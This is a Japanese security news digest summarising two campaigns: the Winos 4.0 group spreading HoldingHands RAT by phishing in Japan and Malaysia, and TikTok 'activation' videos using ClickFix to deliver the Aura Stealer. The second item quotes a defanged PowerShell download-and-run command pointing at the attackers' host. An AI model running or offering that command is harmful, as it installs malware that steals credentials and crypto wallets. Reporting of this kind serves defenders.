Winos 4.0のハッカー、HoldingHands RATを使って日本・マレーシアに攻撃を拡大

佐々山 Tacos

2025.10.20

2025年10月20日：サイバーセキュリティ関連ニュース

Winos 4.0の背後にいるハッカー、HoldingHands RATマルウェアを使って日本・マレーシアに攻撃を拡大

Security Affairs – October 18, 2025

Winos 4.0マルウェアで中国・台湾を攻撃しているハッカーグループが標的を日本・マレーシアにも拡大し、フィッシングを用いてHoldingHands RATマルウェアを配布しようと試みているという。FortinetのFortiGuard Labsが報告した。

FortiGuard Labsは2025年1月に、台湾のユーザーを狙ったWinos 4.0（別称ValleyRAT）の攻撃を観測。しかし2月には攻撃者がマルウェアファミリーに変更を加えたことが明確となり、中国から台湾、日本、さらにマレーシアへとオペレーションが拡大する様子が見受けられたという。

キャンペーンは、悪意あるリンクが埋め込まれたPDFファイル付きのフィッシングメールを利用する。これらのファイルは台湾財政部の公式文書を模倣しており、Winos 4.0マルウェアの配布につながるものも含めていくつかのリンクを含んでいる。なお、Winos 4.0の使用は主に中国のサイバー犯罪グループSilver Fox（SwimSnake、The Great Thief of Valley、UTG-Q-1000、Void Arachneとも）と関連づけられており、同グループによる台湾および日本をHoldingHands RATで狙う攻撃については、2025年6月にサイバーセキュリティ企業/研究者somedieyoungZZが文書化していた。

財政部の公式文書に見せかけたこれらのリンクの大半はTencent Cloud（クラウドストレージ）につながっており、FortiGuard Labsのアナリストは、URLに埋め込まれた一意のアカウントIDに基づき、さらに複数のフィッシングファイルを同じ脅威オペレーションに結びつけることに成功している。アナリストが新たに入手したこれらのPDFファイルにはHoldingHands RATを配布するものも含まれており、財政部の文書だけでなくその他の省庁の公式文書や発注書を装ったファイルが使われるなど、模倣の対象も広がっていたという。またこのフェーズにおいては、Tencent Cloudのリンクではなくカスタムドメインを用いたリンクがマルウェア配布に使われるようになっていた。これらのドメインには、セカンドレベルドメインに台湾を意味する「tw」が含まれるという共通点がある。

アナリストはまた、新しく見つかったPDFの中から日本を標的とした新たな攻撃の特定にも成功。このPDFは台湾に関する税制改正案に見せかけたものだが、ターゲットユーザーがリンクを踏むと日本語のページにリダイレクトさせられる。ターゲットユーザーは当該ページで、HoldingHands RATペイロードの配布につながるZIPファイルをダウンロードするよう仕向けられるようになっていたという。

FortiGuard Labsが観測した最も新しい攻撃は、マレーシアを狙ったもの。このキャンペーンでは、Windowsタスクスケジューラを使って多段階の感染チェーンをスタートさせる手法が採用されており、それ以前のキャンペーンのようにアーティファクトを残さないことから、検出が難しくなっているとされる。最終的に展開されるHoldingHandsマルウェアはこれまでのものと同様であるとみられるものの、レジストリへ書き込むという形でサーバーIPをアップデートするというC2タスクが新たに追加されているとのこと。

FortiGuard Labsのブログ記事では、ドメインやIPなどのIoCも共有されている。

TikTok動画通じたClickFix攻撃、引き続きスティーラー配布に使用される

BleepingComputer – October 19, 2025

2025年5月に、TikTok動画を通じたClickFix戦術により情報窃取型マルウェアを配布するキャンペーンが観測されていたが、これとほぼ同様のキャンペーンが、今でも進行中だという。セキュリティコンサルタントのXavier Mertens氏が観測した。

この新たなキャンペーンでは、WindowsやSpotify、Netflix、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitroといった人気ソフトウェアの無料アクティベーションガイドに見せかけたTikTok動画が使われる。動画では、こうした製品をアクティベートするのに必要だと見せかけて、「iex (irm slmgr[.]win/製品名)」のようなコマンドをPowerShellで実行するよう視聴者に伝えるという。製品名の部分は、「photoshop」や「windows」など、動画の内容に応じて変化する。

視聴者がこれを信じてコマンドを実行すると、PowerShellは「slmgr[.]win」というリモートサイトへ接続し、別のPowerShellスクリプトを取得・実行。このスクリプトによりCloudflareページから2つの実行ファイルがダウンロードされる。この実行ファイルの1つであるAura Stealerマルウェアの亜種は、ブラウザに保存された認証情報や、その他のアプリケーション内の認証クッキー、暗号資産ウォレット、認証情報を収集する性能を持つ。このスティーラーに加えて、「source.exe」という別のペイロードもダウンロードされるものの、このペイロードの目的はわかっていないという。

ClickFixは「エラーの修正」や何らかの手順に見せかけてユーザーを騙し、悪意あるPowerShellコマンドやスクリプトを実行するよう仕向けるソーシャルエンジニアリング手法。ここ1年ほどにかけ、サイバー脅威アクターらに広く使用されるようになっており、ランサムウェアキャンペーンや暗号資産窃取キャンペーンなどにおける多様なマルウェア亜種の配布手口として使われている。こうした攻撃から身を守るため、ユーザーには、Webサイトからコピーしたテキストを決してOSのダイアログボックス（コマンドプロンプト、PowerShellプロンプト、macOSターミナル、Linuxシェル、ファイルエクスプローラーのアクセスバーなど）で実行しないようにすることが求められる。